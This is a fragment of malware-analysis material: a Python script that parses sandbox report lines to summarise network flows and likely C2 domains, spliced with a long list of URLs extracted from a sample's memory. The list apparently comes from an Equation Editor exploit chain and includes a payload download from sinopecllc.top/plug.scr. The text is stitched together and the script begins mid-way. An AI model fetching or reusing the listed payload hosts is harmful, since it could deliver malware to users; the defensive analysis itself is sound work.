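Source: global traffic | HTTP traffic detected: GET /plug.scr HTTP/1.1 | Accept: */* | Host: sinopecllc.top | Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
""".strip().splitlines()

KINDS = ("TCP traffic", "DNS traffic detected", "HTTP traffic detected", "URLs")
# The source column and the finding may be separated by " | " or by nothing at all.
ENTRY_RE = re.compile(
    r"^Source:\s*(?P<source>.*?)\s*\|?\s*(?P<kind>" + "|".join(KINDS) + r"):\s*(?P<detail>.*)$"
)
TCP_RE = re.compile(r"^([\d.]+):(\d+) -> ([\d.]+):(\d+)$")
DNS_RE = re.compile(r"DNS query:\s*([a-z0-9.-]+)")
# A Host value ends at a " | " separator, at the next run-together header name
# (e.g. "...netCache-Control:"), or at the end of the line.
HOST_RE = re.compile(r"Host:\s*([a-z0-9.-]+?)(?=\s*\||[A-Z][A-Za-z-]*:|$)")


def is_private(ip: str) -> bool:
    return ipaddress.ip_address(ip).is_private


def summarise(lines):
    flows = Counter()          # (client, server, server_port) -> number of segments seen
    domains = set()            # names the sample resolved
    http = defaultdict(set)    # Host -> request lines ("GET /path") seen for it
    config = set()             # C2 values reported by the configuration extractor
    for line in lines:
        m = ENTRY_RE.match(line.strip())
        if not m:
            continue
        kind, detail = m.group("kind"), m.group("detail").strip()
        if kind == "TCP traffic":
            t = TCP_RE.match(detail)
            if not t:
                continue
            src, sport, dst, dport = t.groups()
            # The sandbox host sits in RFC 1918 space; key on the remote end so that
            # both directions of one connection increment the same counter.
            if is_private(src) and not is_private(dst):
                flows[(src, dst, int(dport))] += 1
            elif is_private(dst) and not is_private(src):
                flows[(dst, src, int(sport))] += 1
        elif kind == "DNS traffic detected":
            d = DNS_RE.search(detail)
            if d:
                domains.add(d.group(1))
        elif kind == "HTTP traffic detected" and detail.split(" ", 1)[0] in ("GET", "POST"):
            h = HOST_RE.search(detail)
            if h:
                http[h.group(1)].add(detail.split(" HTTP/", 1)[0])
        elif kind == "URLs":
            config.add(detail)
    return {"flows": flows, "domains": domains, "http": dict(http), "config": config}


def raw_tcp_candidates(summary) -> set:
    """Resolved names never used as an HTTP Host: for a RAT these are the likely
    raw-TCP C2 names, to be compared with the configuration extractor's output."""
    return summary["domains"] - set(summary["http"])


if __name__ == "__main__":
    s = summarise(SAMPLE_LINES)
    for (client, server, port), n in sorted(s["flows"].items()):
        print(f"{client} -> {server}:{port}  segments={n}")
    print("HTTP hosts:", {h: sorted(v) for h, v in s["http"].items()})
    print("resolved, no HTTP Host:", raw_tcp_candidates(s), "config:", s["config"])
```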
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://acdn.adnxs.com/ast/ast.js
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://b.scorecardresearch.com/beacon.js
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
Source: EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363803230.0000000000378000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363811273.0000000000383000.00000004.00000020.00020000.00000000.sdmp, plug[1].scr.2.dr, znlzneAxBVd.exe.5.dr, plugman23456.scr.2.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363803230.0000000000378000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363811273.0000000000383000.00000004.00000020.00020000.00000000.sdmp, plug[1].scr.2.dr, znlzneAxBVd.exe.5.dr, plugman23456.scr.2.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
Source: plugman23456.scr, 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, znlzneAxBVd.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: plugman23456.scr, 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, znlzneAxBVd.exe, 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvEBA7.tmp.21.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363803230.0000000000378000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363811273.0000000000383000.00000004.00000020.00020000.00000000.sdmp, plug[1].scr.2.dr, znlzneAxBVd.exe.5.dr, plugman23456.scr.2.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: plugman23456.scr, 00000005.00000002.378628217.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, znlzneAxBVd.exe, 0000000F.00000002.400864194.0000000002691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.363793468.0000000000387000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.363969598.0000000000304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sinopecllc.top/plug.scr
                  Source: EQNEDT32.EXE, 00000002.00000003.363793468.0000000000387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sinopecllc.top/plug.scrC:
                  Source: EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sinopecllc.top/plug.scriiC:
                  Source: EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sinopecllc.top/plug.scrj
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: plugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: plugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: plugman23456.scr, 00000017.00000002.387492879.00000000001FC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
                  Source: plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://www.msn.com/
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: plugman23456.scr, 00000015.00000002.392417743.0000000000254000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://contextual.media.net/
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
